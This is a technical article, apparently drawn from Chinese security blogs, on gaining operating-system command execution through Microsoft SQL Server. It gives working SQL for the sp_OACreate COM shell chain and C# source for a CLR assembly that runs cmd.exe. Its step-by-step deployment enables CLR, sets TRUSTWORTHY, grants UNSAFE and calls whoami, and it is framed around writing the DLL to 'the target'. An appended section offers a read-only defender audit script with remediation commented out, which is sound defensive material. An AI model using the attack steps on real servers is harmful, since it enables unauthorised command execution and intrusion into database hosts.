Executing commands using COM
(The Ole Automation Procedures component needs to be enabled.)

```sql
declare @luan int, @exec int, @text int, @str varchar(8000);
exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}', @luan output;
exec sp_oamethod @luan, 'exec', @exec output, 'C:\\Windows\\System32\\cmd.exe /c whoami';
exec sp_oamethod @exec, 'StdOut', @text out;
exec sp_oamethod @text, 'readall', @str out;
select @str;
```
If Ole Automation Procedures is not enabled, you can use the following commands to enable it:

```sql
sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
sp_configure 'Ole Automation Procedures', 1;
GO
RECONFIGURE;
GO
```
Writing language: C#

Create a class library project in Visual Studio:

```csharp
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;

namespace shellexec
{
    public class exec
    {
        public static string cmd(string command)
        {
            System.Diagnostics.Process pro = new System.Diagnostics.Process();
            pro.StartInfo.FileName = "cmd.exe";
            pro.StartInfo.UseShellExecute = false;
            pro.StartInfo.RedirectStandardError = true;    // Standard error
            pro.StartInfo.RedirectStandardInput = true;    // Standard input
            pro.StartInfo.RedirectStandardOutput = true;   // Standard output
            pro.StartInfo.CreateNoWindow = true;           // Do not start the process in a new window
            pro.Start();
            pro.StandardInput.AutoFlush = true;            // Flush the input buffer automatically
            pro.StandardInput.WriteLine(command + "&&exit"); // Write the command, then make cmd exit
            string output = pro.StandardOutput.ReadToEnd(); // Read the execution result
            pro.WaitForExit();                             // Wait for execution to complete
            pro.Close();
            return output;
        }
    }
}
```
After generating the DLL, you can write it to the target using the hex method, or upload it via a shell. Then start constructing:
1. The target database instance needs to have CLR integration enabled

```sql
exec sp_configure 'clr enabled', 1; -- Enable CLR in SQL Server
reconfigure;
go
```
2. The TRUSTWORTHY property of the target database needs to be set to ON. You can use the following statement to enable it

```sql
ALTER DATABASE [<Database name>] SET TRUSTWORTHY ON
```
3. Register the DLL in the database

```sql
CREATE ASSEMBLY MySqlCLR FROM '<path to dll>' -- MySqlCLR is the name the imported DLL is referenced by
```
4. Create a function

(Construct the parameter types to match the parameters of the corresponding .NET method; if it returns a string type, remember to set RETURNS [nvarchar](max) so the full result is returned; then reference the DLL's namespace, class and method directly.)

```sql
CREATE FUNCTION [dbo].[cmd2]
(
    @cmd AS NVARCHAR(max)
)
RETURNS [nvarchar](max) WITH EXECUTE AS CALLER
AS
EXTERNAL NAME [MySqlCLR].[shellexec.exec].cmd -- shellexec is the namespace, exec is the class name, cmd is the method name
GO
```
5. The assembly needs the UNSAFE permission set to get the required access, otherwise an error will be reported during deployment

```sql
ALTER ASSEMBLY [MySqlCLR]
WITH PERMISSION_SET = UNSAFE
```
6. Call the stored procedure or function

```sql
select [dbo].[cmd2]('whoami')
```
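Both paths on this page (the sp_OACreate chain in the first section and the six-step CLR deployment above) depend on a handful of instance and database settings that a DBA can enumerate. The following T-SQL audit script is an added example and is not part of the original article or its references; it reports the relevant switches in `sys.configurations`, databases flagged TRUSTWORTHY, every user assembly with EXTERNAL_ACCESS or UNSAFE permissions together with the T-SQL modules bound to it (which is where the `shellexec.exec`/`cmd` binding from step 4 would surface), and cached batches that reference `sp_OACreate`, `sp_OAMethod` or `CREATE ASSEMBLY`. It is read-only; the remediation statements at the end are deliberately commented out. The database name in the remediation section is a placeholder.

```sql
-- Added example: defender's audit of the settings the OLE Automation and CLR
-- execution paths rely on. Requires VIEW SERVER STATE (or sysadmin). Read-only.
SET NOCOUNT ON;

-- 1. Instance-wide switches. Ole Automation Procedures, clr enabled and xp_cmdshell
--    should normally be 0; clr strict security (SQL Server 2017+) should be 1.
SELECT name,
       value_in_use,
       CASE
           WHEN name = 'clr strict security'
                THEN CASE WHEN value_in_use = 0 THEN 'REVIEW (strict security off)' ELSE 'ok' END
           WHEN value_in_use = 1 THEN 'REVIEW (enabled)'
           ELSE 'ok'
       END AS finding
FROM sys.configurations
WHERE name IN ('Ole Automation Procedures', 'clr enabled', 'xp_cmdshell', 'clr strict security')
ORDER BY name;

-- 2. Databases with TRUSTWORTHY ON (msdb is TRUSTWORTHY by default and is excluded).
--    A TRUSTWORTHY database owned by a sysadmin login is what lets step 2 above succeed.
SELECT name AS database_name,
       SUSER_SNAME(owner_sid) AS owner_login,
       is_trustworthy_on
FROM sys.databases
WHERE is_trustworthy_on = 1
  AND name <> 'msdb';

-- 3. User assemblies that are not SAFE, in every online user database, with the
--    T-SQL functions/procedures bound to them (sys.assembly_modules).
DECLARE @db  sysname,
        @sql nvarchar(max);
DECLARE @assemblies TABLE (
    database_name  sysname,
    assembly_name  sysname,
    permission_set nvarchar(60),
    clr_name       nvarchar(4000),
    module_name    sysname NULL,
    clr_class      nvarchar(max) NULL,
    clr_method     nvarchar(max) NULL,
    create_date    datetime
);

DECLARE db_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT name FROM sys.databases
    WHERE state_desc = 'ONLINE' AND database_id > 4;  -- skip master, tempdb, model, msdb
OPEN db_cursor;
FETCH NEXT FROM db_cursor INTO @db;
WHILE @@FETCH_STATUS = 0
BEGIN
    SET @sql = N'SELECT ' + QUOTENAME(@db, '''') + N' AS database_name,
                        a.name, a.permission_set_desc, a.clr_name,
                        o.name, m.assembly_class, m.assembly_method, a.create_date
                 FROM ' + QUOTENAME(@db) + N'.sys.assemblies AS a
                 LEFT JOIN ' + QUOTENAME(@db) + N'.sys.assembly_modules AS m
                        ON m.assembly_id = a.assembly_id
                 LEFT JOIN ' + QUOTENAME(@db) + N'.sys.objects AS o
                        ON o.object_id = m.object_id
                 WHERE a.is_user_defined = 1
                   AND a.permission_set_desc <> N''SAFE_ACCESS'';';
    INSERT INTO @assemblies
    EXEC sp_executesql @sql;
    FETCH NEXT FROM db_cursor INTO @db;
END
CLOSE db_cursor;
DEALLOCATE db_cursor;

SELECT * FROM @assemblies
ORDER BY database_name, assembly_name;

-- 4. Recently cached batches that touch the OLE Automation procedures or register
--    assemblies. (This audit batch itself will match on subsequent runs.)
SELECT TOP (50)
       qs.last_execution_time,
       qs.execution_count,
       LEFT(st.text, 400) AS query_text
FROM sys.dm_exec_query_stats AS qs
CROSS APPLY sys.dm_exec_sql_text(qs.sql_handle) AS st
WHERE st.text LIKE '%sp_OACreate%'
   OR st.text LIKE '%sp_OAMethod%'
   OR st.text LIKE '%CREATE ASSEMBLY%'
ORDER BY qs.last_execution_time DESC;

-- 5. Remediation, intentionally commented out. Apply only after confirming that
--    no legitimate workload depends on the setting or assembly.
-- EXEC sp_configure 'Ole Automation Procedures', 0; RECONFIGURE;
-- EXEC sp_configure 'clr enabled', 0; RECONFIGURE;
-- ALTER DATABASE [<database name>] SET TRUSTWORTHY OFF;   -- placeholder name
-- DROP FUNCTION [dbo].[cmd2]; DROP ASSEMBLY [MySqlCLR];    -- names from the steps above
```

Two caveats worth keeping in mind when reading the results. Section 3 only finds assemblies whose permission set has already been raised; the `CREATE ASSEMBLY` in step 3 lands as SAFE_ACCESS until the `ALTER ASSEMBLY ... UNSAFE` in step 5 runs, so the plan-cache search in section 4 is the part that catches a deployment in progress. On SQL Server 2017 and later, `clr strict security` is on by default and treats every assembly as UNSAFE, so an unsigned DLL fails to load regardless of TRUSTWORTHY; leaving that option on, and signing legitimate assemblies with a certificate or asymmetric key registered on the instance, is the single most effective control against the CLR path described above.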
Reference links:
https://blog.csdn.net/catchme_439/article/details/78411009
https://zhuanlan.zhihu.com/p/33322584?from_voters_page=true